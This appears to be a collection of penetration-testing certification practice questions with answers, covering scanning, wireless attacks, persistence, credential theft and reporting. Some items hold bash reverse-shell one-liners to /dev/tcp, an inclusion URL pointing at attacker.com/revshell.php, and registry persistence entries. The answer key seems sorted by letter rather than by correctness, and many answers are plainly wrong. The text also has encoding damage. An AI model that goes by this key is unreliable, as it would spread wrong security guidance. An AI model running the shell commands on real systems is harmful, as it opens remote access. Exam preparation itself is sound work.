Pentest
A penetration tester has been asked to conduct OS fingering with Nmap using a company-provided text file that contains a list of IP addresses. Which of the following are needed to conduct this scan? (Choose two.) A. -O B. -iL C. -sV D. -sS E. -oN F. -oX.
A. -O B. -iL
A consultant wants to scan all the TCP ports on an identified device. Which of the following Nmap switches will complete this task? A. -p- B. -p ALL C. -p 1-65534 D. -port 1-65534
A. -p-
Joe, a penetration tester, is asked to assess a companyג€™s physical security by gaining access to its corporate office. Joe is looking for a method that will enable him to enter the building during business hours or when there are no employees on-site. Which of the following would be the MOST effective in accomplishing this? A. Badge cloning B. Lock picking C. Tailgating D. Piggybacking
A. Badge cloning
An attacker performed a MITM attack against a mobile application. The attacker is attempting to manipulate the applicationג€™s network traffic via a proxy tool. The attacker only sees limited traffic as cleartext. The application log files indicate secure SSL/TLS connections are failing. Which of the following is MOST likely preventing proxying of all traffic? A. Misconfigured routes B. Certificate pinning C. Strong cipher suites D. Closed ports
B. Certificate pinning
A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform? A. Command injection attack B. Clickjacking attack C. Directory traversal attack D. Remote file inclusion attack
B. Clickjacking attack
After establishing a shell on a target system, Joe, a penetration tester is aware that his actions have not been detected. He now wants to maintain persistent access to the machine. Which of the following methods would be MOST easily detected? A. Run a zero-day exploit. B. Create a new domain user with a known password. C. Modify a known boot time service to instantiate a call back. D. Obtain cleartext credentials of the compromised user.
B. Create a new domain user with a known password.
A penetration tester is attempting to capture a handshake between a client and an access point by monitoring a WPA2-PSK secured wireless network. The tester is monitoring the correct channel for the identified network, but has been unsuccessful in capturing a handshake. Given the scenario, which of the following attacks would BEST assist the tester in obtaining this handshake? A. Karma attack B. Deauthentication attack C. Fragmentation attack D. SSDI broadcast flood
B. Deauthentication attack
A client needs to be PCI compliant and has external-facing web servers. Which of the following CVSS vulnerability scores would automatically bring the client out of compliance standards such as PCI 3.x? A. 2.9 B. 3.0 C. 4.0 D. 5.9
C. 4.0
Which of the following would be the BEST for performing passive reconnaissance on a targetג€™s external domain? A. Peach B. CeWL C. OpenVAS D. Shodan
D. Shodan
A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (SelectTWO). A. Convert to JAR. B. Decompile. C. Cross-compile the application. D. Convert JAR files to DEX. E. Re-sign the APK. F. Attach to ADB.
A. Convert to JAR. B. Decompile.
A penetration tester is performing a wireless penetration test. Which of the following are some vulnerabilities that might allow the penetration tester to easily and quickly access a WPA2-protected access point? A. Deauthentication attacks against an access point can allow an opportunity to capture the four-way handshake, which can be used to obtain and crack the encrypted password. B. Injection of customized ARP packets can generate many initialization vectors quickly, making it faster to crack the password, which can then be used to connect to the WPA2-protected access point. C. Weak implementations of the WEP can allow pin numbers to be guessed quickly, which can then be used to retrieve the password, which can then be used to connect to the WEP-protected access point. D. Rainbow tables contain all possible password combinations, which can be used to perform a brute-force password attack to retrieve the password, which can then be used to connect to the WPA2-protected access point.
A. Deauthentication attacks against an access point can allow an opportunity to capture the four-way handshake, which can be used to obtain and crack the encrypted password.
A security analyst has uncovered a suspicious request in the logs for a web application. Given the following URL: http://example.com/download.php?id-.../.../.../etc/passwd Which of the following attack types is MOST likely to be the vulnerability? A. Directory traversal B. Cross-site scripting C. Remote file inclusion D. User enumeration
A. Directory traversal
An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment? A. Selection of the appropriate set of security testing tools B. Current and load ratings of the ICS components C. Potential operational and safety hazards D. Electrical certification of hardware used in the test
A. Selection of the appropriate set of security testing tools
A penetration test was performed by an on-staff junior technician. During the test, the technician discovered the web application could disclose an SQL table with user account and password information. Which of the following is the MOST effective way to notify management of this finding and its importance? A. Document the findings with an executive summary, recommendations, and screenshots of the web application disclosure. B. Connect to the SQL server using this information and change the password to one or two non-critical accounts to demonstrate a proof--of-concept to management. C. Notify the development team of the discovery and suggest that input validation be implemented with a professional penetration testing company. D. Request that management create an RFP to begin a formal engagement with a professional penetration testing company.
A. Document the findings with an executive summary, recommendations, and screenshots of the web application disclosure.
A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy? A. Enable HTTP Strict Transport Security. B. Enable a secure cookie flag. C. Encrypt the communication channel. D. Sanitize invalid user input.
A. Enable HTTP Strict Transport Security.
A vulnerability scan identifies that an SSL certificate does not match the hostname; however, the client disputes the finding. Which of the following techniques can the penetration tester perform to adjudicate the validity of the findings? A. Ensure the scanner can make outbound DNS requests. B. Ensure the scanner is configured to perform ARP resolution. C. Ensure the scanner is configured to analyze IP hosts. D. Ensure the scanner has the proper plug -ins loaded.
A. Ensure the scanner can make outbound DNS requests.
Which of the following are MOST important when planning for an engagement? (Select TWO). A. Goals/objectives B. Architectural diagrams C. Tolerance to impact D. Storage time for a report E. Company policies
A. Goals/objectives E. Company policies
An engineer, who is conducting a penetration test for a web application, discovers the user login process sends from field data using the HTTP GET method. To mitigate the risk of exposing sensitive information, the form should be sent using an: A. HTTP POST method. B. HTTP OPTIONS method. C. HTTP PUT method. D. HTTP TRACE method.
A. HTTP POST method.
Which of the following tools is used to perform a credential brute force attack? A. Hydra B. John the Ripper C. Hashcat D. Peach
A. Hydra
Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in electrical utility facilities, natural gas facilities, dams, and nuclear facilities? A. ICS vendors are slow to implement adequate security controls. B. ICS staff are not adequately trained to perform basic duties. C. There is a scarcity of replacement equipment for critical devices. D. There is a lack of compliance for ICS facilities.
A. ICS vendors are slow to implement adequate security controls.
A penetration tester executes the following commands:Which of the following is a local host vulnerability that the attacker is exploiting? (image of file transference to a different directory) A. Insecure file permissions B. Application whitelisting C. Shell escape D. Writable service
A. Insecure file permissions
Joe, a penetration tester, has received basic account credentials and logged into a Windows system. To escalate his privilege, from which of the following places is he using Mimikatz to pull credentials? A. LSASS B. SAM database C. Active Directory D. Registry
A. LSASS
A company has engaged a penetration tester to perform an assessment for an application that resides in the companyג€™s DMZ. Prior to conducting testing, in which of the following solutions should the penetration testerג€™s IP address be whitelisted? A. WAF B. HIDS C. NIDS D. DLP
A. WAF
A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack. Which of the following remediation steps should be recommended? (SelectTHREE). A. Mandate all employees take security awareness training. B. Implement two-factor authentication for remote access. C. Install an intrusion prevention system D. Increase password complexity requirements. E. Install a security information event monitoring solution F. Prevent members of the IT department from interactively logging in as administrators. G. Upgrade the cipher suite used for the VPN solution.
A. Mandate all employees take security awareness training. B. Implement two-factor authentication for remote access. D. Increase password complexity requirements.
Consumer-based IoT devices are often less secure than systems built for traditional desktop computers. Which of the following BEST describes the reasoning for this? A. Manufacturers developing IoT devices are less concerned with security. B. It is difficult for administrators to implement the same security standards across the board. C. IoT systems often lack the hardware power required by more secure solutions. D. Regulatory authorities often have lower security requirements for IoT systems.
A. Manufacturers developing IoT devices are less concerned with security.
Which of the following is the purpose of an NDA? A. Outlines the terms of confidentiality between both parties B. Outlines the boundaries of which systems are authorized for testing C. Outlines the requirements of technical testing that are allowed D. Outlines the detailed configuration of the network
A. Outlines the terms of confidentiality between both parties
A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST meet this goal? A. Perform an HTTP downgrade attack. B. Harvest the user credentials to decrypt traffic. C. Perform an MITM attack. D. Implement a CA attack by impersonating trusted CAs.
A. Perform an HTTP downgrade attack.
A penetration tester has gained access to a marketing employee's device. The penetration tester wants to ensure that if the access is discovered, control of the device can be regained. Which of the following actions should the penetration tester use to maintain persistence to the device? (Select TWO.) A. Place an entry in HKLM\Software\Microsoft\CurrentVersion\Run to call au57d.ps1. B. Place an entry in C:\windows\system32\drivers\etc\hosts for 12.17.20.10 badcomptia.com. C. Place a script in C:\users\%username\local\appdata\roaming\temp\au57d.ps1. D. Create a fake service in Windows called RTAudio to execute manually. E. Place an entry for RTAudio in HKLM\CurrentControlSet\Services\RTAudio. F. Create a schedule task to call C:\windows\system32\drivers\etc\hosts.
A. Place an entry in HKLM\Software\Microsoft\CurrentVersion\Run to call au57d.ps1. C. Place a script in C:\users\%username\local\appdata\roaming\temp\au57d.ps1.
A tester has determined that null sessions are enabled on a domain controller. Which of the following attacks can be performed to leverage this vulnerability? A. RID cycling to enumerate users and groups B. Pass the hash to relay credentials C. Password brute forcing to log into the host D. Session hijacking to impersonate a system account
A. RID cycling to enumerate users and groups
A security consultant receives a document outlining the scope of an upcoming penetration test. This document contains IP addresses and times that each can be scanned. Which of the following would contain this information? A. Rules of engagement B. Request for proposal C. Master service agreement D. Business impact analysis
A. Rules of engagement
After performing a security assessment for a firm, the client was found to have been billed for the time the clientג€™s test environment was unavailable. The client claims to have been billed unfairly. Which of the following documents would MOST likely be able to provide guidance in such a situation? A. SOW B. NDA C. EULA D. BPA
A. SOW
A penetration tester has performed a vulnerability scan of a specific host that contains a valuable database and has identified the following vulnerabilities:✑ XSS✑ HTTP DELETE method allowed✑ SQL injection✑ Vulnerable to CSRFTo which of the following should the tester give the HIGHEST priority? A. SQL injection B. HTTP DELETE method allowed C. Vulnerable to CSRF D. XSS
A. SQL injection
A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovering vulnerabilities, the company asked the consultant to perform the following tasks:✑ Code review✑ Updates to firewall settingsWhich of the following has occurred in this situation? A. Scope creep B. Post-mortem review C. Risk acceptance D. Threat prevention
A. Scope creep
Which of the following has a direct and significant impact on the budget of the security assessment? A. Scoping B. Scheduling C. Compliance requirement D. Target risk
A. Scoping
Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO). A. Shodan B. SET C. BeEF D. Wireshark E. Maltego F. Dynamo
A. Shodan E. Maltego
Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow? A. Stack pointer register B. Index pointer register C. Stack base pointer D. Destination index register
A. Stack pointer register
A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation? A. Stored XSS B. Fill path disclosure C. Expired certificate D. Clickjacking
A. Stored XSS
A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use? A. TCP SYN flood B. SQL injection C. XSS D. XMAS scan
A. TCP SYN flood
A security guard observes an individual entering the building after scanning a badge. The facility has a strict badge-in and badge-out requirement with a turnstile.The security guard then audits the badge system and finds two log entries for the badge in question within the last 30 minutes. Which of the following has MOST likely occurred? A. The badge was cloned. B. The physical access control server is malfunctioning. C. The system reached the crossover error rate. D. The employee lost the badge.
A. The badge was cloned.
After several attempts, an attacker was able to gain unauthorized access through a biometrics sensor using the attackerג€™s actual fingerprint without exploitation.Which of the following is the MOST likely explanation of what happened? A. The biometric device is tuned more toward false positives. B. The biometric device is configured more toward true negatives. C. The biometric device is set to fail closed D. The biometric device duplicated a valid userג€™s fingerprint.
A. The biometric device is tuned more toward false positives.
A client has scheduled a wireless penetration test. Which of the following describes the scoping target information MOST likely needed before testing can begin? A. The physical location and network ESSIDs to be tested B. The number of wireless devices owned by the client C. The client's preferred wireless access point vendor D. The bands and frequencies used by the client's devices
A. The physical location and network ESSIDs to be tested
Which of the following is the reason why a penetration tester would run the chkconfig --del servicename command at the end of an engagement? A. To remove the persistence B. To enable persistence C. To report persistence D. To check for persistence
A. To remove the persistence
For which of the following reasons does a penetration tester need to have a customerג€™s point-of-contact information available at all times? (Choose three.) A. To report indicators of compromise B. To report findings that cannot be exploited C. To report critical findings D. To report the latest published exploits E. To update payment information F. To report a server that becomes unresponsive G. To update the statement of work H. To report a cracked password
A. To report indicators of compromise C. To report critical findings F. To report a server that becomes unresponsive
Black box penetration testing strategy provides the tester with: A. a target list B. a network diagram C. source code D. privileged credentials
A. a target list
An assessor begins an internal security test of the Windows domain internal.comptia.net. The assessor is given network access via DHCP, but is not given any network maps or target IP addresses. Which of the following commands can the assessor use to find any likely Windows domain controllers? A. dig -q any _kerberos._tcp.internal.comptia.net B. dig -q any _lanman._tcp.internal.comptia.net C. dig -q any _ntlm._tcp.internal.comptia.net D. dig -q any _smtp._tcp.internal.comptia.net
A. dig -q any _kerberos._tcp.internal.comptia.net
Which of the following commands starts the Metasploit database? A. msfconsole B. workspace C. msfvenom D. db_init E. db_connect
A. msfconsole
A tester intends to run the following command on a target system: bash -i >& /dev/tcp/10.2.4.6/443 0> &1Which of the following additional commands would need to be executed on the testerג€™s Linux system to make the previous command successful? A. nc -nlvp 443 B. nc 10.2.4.6. 443 C. nc -w3 10.2.4.6 443 D. nc -e /bin/sh 10.2.4.6. 443
A. nc -nlvp 443
A penetration tester, who is not on the clientג€™s network. is using Nmap to scan the network for hosts that are in scope. The penetration tester is not receiving any response on the command: nmap 100.100/1/0-125Which of the following commands would be BEST to return results? A. nmap -Pn -sT 100.100.1.0-125 B. nmap -sF -p 100.100.1.0-125 C. nmap -sV -oA output 100.100.10-125 D. nmap 100.100.1.0-125 -T4
A. nmap -Pn -sT 100.100.1.0-125
A penetration tester is scanning a network for SSH and has a list of provided targets. Which of the following Nmap commands should the tester use? A. nmap -p 22 -iL targets B. nmap -p 22 -sL targets C. nmap -p 22 -oG targets D. nmap -p 22 -oA targets
A. nmap -p 22 -iL targets
A consultant is attempting to harvest credentials from unsecure network protocols in use by the organization. Which of the following commands should the consultant use? A. tcpdump B. john C. hashcat D. nc
A. tcpdump
A client has voiced concern about the number of companies being breached by remote attackers, who are looking for trade secrets. Which of the following BEST describes the type of adversaries this would identify? A. Script kiddies B. APT actors C. Insider threats D. Hacktivist groups
B. APT actors
A penetration tester has gained physical access to a facility and connected directly into the internal network. The penetration tester now wants to pivot into the server VLAN. Which of the following would accomplish this? A. Spoofing a printerג€™s MAC address B. Abusing DTP negotiation C. Performing LLMNR poisoning D. Conducting an STP attack
B. Abusing DTP negotiation
During post-exploitation, a tester identifies that only system binaries will pass an egress filter and store a file with the following command: c: \creditcards.db>c:\winit\system32\calc.exe:creditcards.dbWhich of the following file system vulnerabilities does this command take advantage of? A. Hierarchical file system B. Alternate data streams C. Backdoor success D. Extended file system
B. Alternate data streams
While monitoring WAF logs, a security analyst discovers a successful attack against the following URL: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.phpWhich of the following remediation steps should be taken to prevent this type of attack? A. Implement a blacklist. B. Block URL redirections. C. Double URL encode the parameters. D. Stop external calls from the application.
B. Block URL redirections.
A senior employee received a suspicious email from another executive requesting an urgent wire transfer. Which of the following types of attacks is likely occurring? A. Spear phishing B. Business email compromise C. Vishing D. Whaling
B. Business email compromise
A penetration tester has run multiple vulnerability scans against a target system. Which of the following would be unique to a credentialed scan? A. Exploits for vulnerabilities found B. Detailed service configurations C. Unpatched third-party software D. Weak access control configurations
B. Detailed service configurations
During a physical security review, a detailed penetration testing report was obtained, which was issued to a security analyst and then discarded in the trash. The report contains validated critical risk exposures. Which of the following processes would BEST protect this information from being disclosed in the future? A. Restrict access to physical copies to authorized personnel only. B. Ensure corporate policies include guidance on the proper handling of sensitive information. C. Require only electronic copies of all documents to be maintained. D. Install surveillance cameras near all garbage disposal areas.
B. Ensure corporate policies include guidance on the proper handling of sensitive information.
A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this? A. Appendices B. Executive summary C. Technical summary D. Main body
B. Executive summary
A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task? A. From the remote computer, run the following commands: export XHOST 192.168.1.10:0.0 xhost+ Terminal B. From the local computer, run the following command: ssh -L4444:127.0.0.1:6000 -X [email protected] xterm C. From the remote computer, run the following command: ssh -R6000:127.0.0.1:4444 -p 6000 [email protected] ג€xhost+; xtermג€ D. From the local computer, run the following command: nc -l -p 6000 Then, from the remote computer, run the following command: xterm | nc 192.168.1.10 6000
B. From the local computer, run the following command: ssh -L4444:127.0.0.1:6000 -X [email protected] xterm
An individual has been hired by an organization after passing a background check. The individual has been passing information to a competitor over a period of time. Which of the following classifications BEST describes the individual? A. APT B. Insider threat C. Script kiddie D. Hacktivist
B. Insider threat
A penetration tester is reviewing a Zigbee implementation for security issues. Which of the following device types is the tester MOST likely testing? A. Router B. IoT C. WAF D. PoS
B. IoT
A companyג€™s corporate policies state that employees are able to scan any global network as long as it is done within working hours. Government laws prohibit unauthorized scanning. Which of the following should an employee abide by? A. Company policies must be followed in this situation. B. Laws supersede corporate policies. C. Industry standards regarding scanning should be followed. D. The employee must obtain written approval from the companyג€™s Chief Information Security Officer (CISO) prior to scanning.
B. Laws supersede corporate policies.
At the beginning of a penetration test, the tester finds a file that includes employee data, such as email addresses, work phone numbers, computers names, and office locations. The file is hosted on a public web server. Which of the following BEST describes the technique that was used to obtain this information? A. Enumeration of services B. OSINT gathering C. Port scanning D. Social engineering
B. OSINT gathering
During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by physically engaging them? A. Locating emergency exits B. Preparing a pretext C. Shoulder surfing the victim D. Tailgating the victim
B. Preparing a pretext
An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used in this attack? A. Principle of fear B. Principle of authority C. Principle of scarcity D. Principle of likeness E. Principle of social proof
B. Principle of authority
A penetration tester has obtained access to an IP network subnet that contains ICS equipment intercommunication. Which of the following attacks is MOST likely to succeed in creating a physical effect? A. DNS cache poisoning B. Record and replay C. Supervisory server SMB D. Blind SQL injection
B. Record and replay
A penetration tester needs to provide the code used to exploit a DNS server in the final report. In which of the following parts of the report should the penetration tester place the code? A. Executive summary B. Remediation C. Conclusion D. Technical summary
B. Remediation
A client requests that a penetration tester emulate a help desk technician who was recently laid off. Which of the following BEST describes the abilities of the threat actor? A. Advanced persistent threat B. Script kiddie C. Hacktivist D. Organized crime
B. Script kiddie
Which of the following properties of the penetration testing engagement agreement will have the LARGEST impact on observing and testing production systems at their highest loads? A. Creating a scope of the critical production systems B. Setting a schedule of testing access times C. Establishing a white-box testing engagement D. Having management sign off on intrusive testing
B. Setting a schedule of testing access times
The following command is run on a Linux file system:chmod 4111 /usr/bin/sudoWhich of the following issues may be exploited now? A. Kernel vulnerabilities B. Sticky bits C. Unquoted service path D. Misconfigured sudo
B. Sticky bits
Which of the following is an example of a spear phishing attack? A. Targeting an executive with an SMS attack B. Targeting a specific team with an email attack C. Targeting random users with a USB key drop D. Targeting an organization with a watering hole attack
B. Targeting a specific team with an email attack
Which of the following situations would cause a penetration tester to communicate with a system owner/client during the course of a test? (Select TWO.) A. The tester discovers personally identifiable data on the system. B. The system shows evidence of prior unauthorized compromise. C. The system shows a lack of hardening throughout. D. The system becomes unavailable following an attempted exploit. E. The tester discovers a finding on an out-of-scope system.
B. The system shows evidence of prior unauthorized compromise. D. The system becomes unavailable following an attempted exploit.
Which of the following is the MOST comprehensive type of penetration test on a network? A. Black box B. White box C. Gray box D. Red team E. Architecture review
B. White box
A penetration tester successfully exploits a system, receiving a reverse shell. Which of the following is a Meterpreter command that is used to harvest locally stored credentials? A. background B. hashdump C. session D. getuid E. psexec
B. hashdump
A company performed an annual penetration test of its environment. In addition to several new findings, all of the previously identified findings persisted on the latest report. Which of the following is the MOST likely reason? A. Infrastructure is being replaced with similar hardware and software. B. Systems administrators are applying the wrong patches. C. The organization is not taking action to remediate identified findings. D. The penetration testing tools were misconfigured.
C. The organization is not taking action to remediate identified findings.
After a recent penetration test, a company has a finding regarding the use of dictionary and seasonal passwords by its employees. Which of the following is the BEST control to remediate the use of common dictionary terms? A. Expand the password length from seven to 14 characters. B. Implement password history restrictions. C. Configure password filters D. Disable the accounts after five incorrect attempts. E. Decrease the password expiration window.
C. Configure password filters
Which of the following BEST protects against a rainbow table attack? A. Increased password complexity B. Symmetric encryption C. Cryptographic salting D. Hardened OS configurations
C. Cryptographic salting
A company contracted a firm specializing in penetration testing to assess the security of a core business application. The company provided the firm with a copy of the Java bytecode. Which of the following steps must the firm take before it can run a static code analyzer? A. Run the application through a dynamic code analyzer. B. Employ a fuzzing utility. C. Decompile the application. D. Check memory allocations.
C. Decompile the application.
A systems security engineer is preparing to conduct a security assessment of some new applications. The applications were provided to the engineer as a set that contains only JAR files. Which of the following would be the MOST detailed method to gather information on the inner workings of these applications? A. Launch the applications and use dynamic software analysis tools, including fuzz testing. B. Use a static code analyzer on the JAR files to look for code quality deficiencies. C. Decompile the applications to approximate source code and then conduct a manual review. D. Review the details and extensions of the certificate used to digitally sign the code and the application.
C. Decompile the applications to approximate source code and then conduct a manual review.
Given the following:http://example.com/download.php?id-.../.../.../etc/passwdWhich of the following BEST describes the above attack? A. Malicious file upload attack B. Redirect attack C. Directory traversal attack D. Insecure direct object reference attack
C. Directory traversal attack
A penetration tester wants to check manually if a ג€ghostג€ vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability? A. Download the GHOST file to a Linux system and compile gcc ג€"o GHOST test i: ./GHOST B. Download the GHOST file to a Windows system and compile gcc ג€"o GHOST GHOST.c test i: ./GHOST C. Download the GHOST file to a Linux system and compile gcc ג€"o GHOST GHOST.c test i: ./GHOST D. Download the GHOST file to a Windows system and compile gcc ג€"o GHOST test i: ./GHOST
C. Download the GHOST file to a Linux system and compile gcc ג€"o GHOST GHOST.c test i: ./GHOST
Which of the following excerpts would come from a corporate policy? A. Employee passwords must contain a minimum of eight characters, with one being alphanumeric. B. The help desk can be reached at 800-passwd1 to perform password resets. C. Employees must use strong passwords for accessing corporate assets. D. The corporate systems must store passwords using the MD5 hashing algorithm.
C. Employees must use strong passwords for accessing corporate assets.
A MITM attack is being planned. The first step is to get information flowing through a controlled device. Which of the following should be used to accomplish this? A. Repeating B. War driving C. Evil twin D. Bluejacking E. Replay attack
C. Evil twin
While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use? A. HKEY_CLASSES_ROOT B. HKEY_LOCAL_MACHINE C. HKEY_CURRENT_USER D. HKEY_CURRENT_CONFIG
C. HKEY_CURRENT_USER
A tester was able to retrieve domain usersג€™ hashes. Which of the following tools can be used to uncover the usersג€™ passwords? (Choose two.) A. Hydra B. Mimikatz C. Hashcat D. John the Ripper E. PSExec F. Nessus
C. Hashcat D. John the Ripper
A recently concluded penetration test revealed that a legacy web application is vulnerable to SQL injection. Research indicates that completely remediating the vulnerability would require an architectural change, and the stakeholders are not in a position to risk the availability on the application. Under such circumstances, which of the following controls are low-effort, short-term solutions to minimize the SQL injection risk? (Choose two.) A. Identity and eliminate inline SQL statements from the code. B. Identify and eliminate dynamic SQL from stored procedures. C. Identify and sanitize all user inputs. D. Use a whitelist approach for SQL statements. E. Use a blacklist approach for SQL statements. F. Identify the source of malicious input and block the IP address.
C. Identify and sanitize all user inputs. D. Use a whitelist approach for SQL statements.
A security assessor completed a comprehensive penetration test of a company and its networks and systems. During the assessment, the tester identified a vulnerability in the crypto library used for TLS on the company's intranet-wide payroll web application. However, the vulnerability has not yet been patched by the vendor, although a patch is expected within days. Which of the following strategies would BEST mitigate the risk of impact? A. Modify the web server crypto configuration to use a stronger cipher-suite for encryption, hashing, and digital signing. B. Implement new training to be aware of the risks in accessing the application. This training can be decommissioned after the vulnerability is patched C. Implement an ACL to restrict access to the application exclusively to the finance department. Reopen the application to company staff after the vulnerability is patched. D. Require payroll users to change the passwords used to authenticate to the application. Following the patching of the vulnerability, implement another required password change.
C. Implement an ACL to restrict access to the application exclusively to the finance department. Reopen the application to company staff after the vulnerability is patched.
A penetration tester was able to enter an SQL injection command into a text box and gain access to the information store on the database. Which of the following is the BEST recommendation that would mitigate the vulnerability? A. Randomize the credentials used to log in. B. Install host-based intrusion detection. C. Implement input normalization. D. Perform system hardening.
C. Implement input normalization.
A penetration tester has performed a pivot to a new Linux device on a different network. The tester writes the following command: for m in {1..254..1};do ping -c 1 192.168.101.$m; doneWhich of the following BEST describes the result of running this command? A. Port scan B. Service enumeration C. Live host identification D. Denial of service
C. Live host identification
If a security consultant comes across a password hash that resembles the following: b117525b345470c29ca3d8ae0b556ba8Which of the following formats is the correct hash type? A. Kerberos B. NetNTLMv1 C. NTLM D. SHA-1
C. NTLM
During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action? A. Disable the network port of the affected service. B. Complete all findings, and then submit them to the client. C. Promptly alert the client with details of the finding. D. Take the target offline so it cannot be exploited by an attacker.
C. Promptly alert the client with details of the finding.
The following line was found in an exploited machine's history file. An attacker ran the following command: bash -i >& /dev/tcp/192.168.0.1/80 0> &1Which of the following describes what the command does? A. Performs a port scan. B. Grabs the web server's banner. C. Redirects a TTY to a remote system. D. Removes error logs for the supplied IP.
C. Redirects a TTY to a remote system.
A clientג€™s systems administrator requests a copy of the report from the penetration tester, but the systems administrator is not listed as a point of contact or signatory. Which of the following is the penetration testerג€™s BEST course of action? A. Send the report since the systems administrator will be in charge of implementing the fixes. B. Send the report and carbon copy the point of contact/signatory for visibility. C. Reply and explain to the systems administrator that proper authorization is needed to provide the report. D. Forward the request to the point of contact/signatory for authorization.
C. Reply and explain to the systems administrator that proper authorization is needed to provide the report.
A penetration tester is able to move laterally throughout a domain with minimal roadblocks after compromising a single workstation. Which of the following mitigation strategies would be BEST to recommend in the report? (Select THREE). A. Randomize local administrator credentials for each machine. B. Disable remote logons for local administrators. C. Require multifactor authentication for all logins. D. Increase minimum password complexity requirements. E. Apply additional network access control. F. Enable full-disk encryption on every workstation. G. Segment each host into its own VLAN.
C. Require multifactor authentication for all logins. D. Increase minimum password complexity requirements. E. Apply additional network access control.
During an internal penetration test, several multicast and broadcast name resolution requests are observed traversing the network. Which of the following tools could be used to impersonate network resources and collect authentication requests? A. Ettercap B. Tcpdump C. Responder D. Medusa
C. Responder
During a vulnerability assessment, the security consultant finds an XP legacy system that is running a critical business function. Which of the following mitigations is BEST for the consultant to conduct? A. Update to the latest Microsoft Windows OS. B. Put the machine behind the WAF. C. Segment the machine from the main network. D. Disconnect the machine.
C. Segment the machine from the main network.
A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform? A. Vulnerability scan B. Dynamic scan C. Static scan D. Compliance scan
C. Static scan
During an engagement, a consultant identifies a number of areas that need further investigation and require an extension of the engagement. Which of the following is the MOST likely reason why the engagement may not be able to continue? A. The consultant did not sign an NDA. B. The consultant was not provided with the appropriate testing tools. C. The company did not properly scope the project. D. The initial findings were not communicated to senior leadership.
C. The company did not properly scope the project.
The scope of a penetration test requires the tester to be stealthy when performing port scans. Which of the following commands with Nmap BEST supports stealthy scanning? A. --min-rate B. --max-length C. --host-timeout D. --max-rate
D. --max-rate
In which of the following scenarios would a tester perform a Kerberoasting attack? A. The tester has compromised a Windows device and dumps the LSA secrets B. The tester needs to retrieve the SAM database and crack the password hashes. C. The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement. D. The tester has compromised an account and needs to dump hashes and plaintext passwords from the system.
C. The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement.
A security analyst was provided with a detailed penetration report, which was performed against the organization's DMZ environment. It was noted on the report that a finding has a CVSS base score of 10.0. Which of the following levels of difficulty would be required to exploit this vulnerability? A. Very difficult; perimeter systems are usually behind a firewall. B. Somewhat difficult; would require significant processing power to exploit. C. Trivial; little effort is required to exploit this finding. D. Impossible; external hosts are hardened to protect against attacks.
C. Trivial; little effort is required to exploit this finding.
A penetration tester has successfully exploited a vulnerability on an organizationג€™s authentication server and now wants to set up a reverse shell. The penetration tester finds that Netcat is not available on the target. Which of the following approaches is a suitable option to attempt NEXT? A. Run xterm to connect to the X-server of the target. B. Attempt to escalate privileges to acquire an interactive shell. C. Try to use the /dev/tcp socket. D. Attempt to read out/etc/shadow.
C. Try to use the /dev/tcp socket.
A penetration tester has been assigned to perform an external penetration assessment of a company. Which of the following steps would BEST help with the passive-information-gathering process? (Choose two.) A. Wait outside of the companyג€™s building and attempt to tailgate behind an employee. B. Perform a vulnerability scan against the companyג€™s external netblock, identify exploitable vulnerabilities, and attempt to gain access. C. Use domain and IP registry websites to identify the companyג€™s external netblocks and external facing applications. D. Search social media for information technology employees who post information about the technologies they work with. E. Identify the companyג€™s external facing webmail application, enumerate user accounts and attempt password guessing to gain access.
C. Use domain and IP registry websites to identify the companyג€™s external netblocks and external facing applications. D. Search social media for information technology employees who post information about the technologies they work with.
A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize? A. nmap -p 53 -oG dnslist.txt | cut -d ג€:ג€ -f 4 B. nslookup -ns 8.8.8.8 << dnslist.txt C. for x in {1...254}; do dig -x 192.168.$x.$x; done D. dig -r > echo ג€8.8.8.8ג€ >> /etc/resolv.conf
C. for x in {1...254}; do dig -x 192.168.$x.$x; done
A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service? A. arpspoof B. nmap C. responder D. burpsuite
C. responder
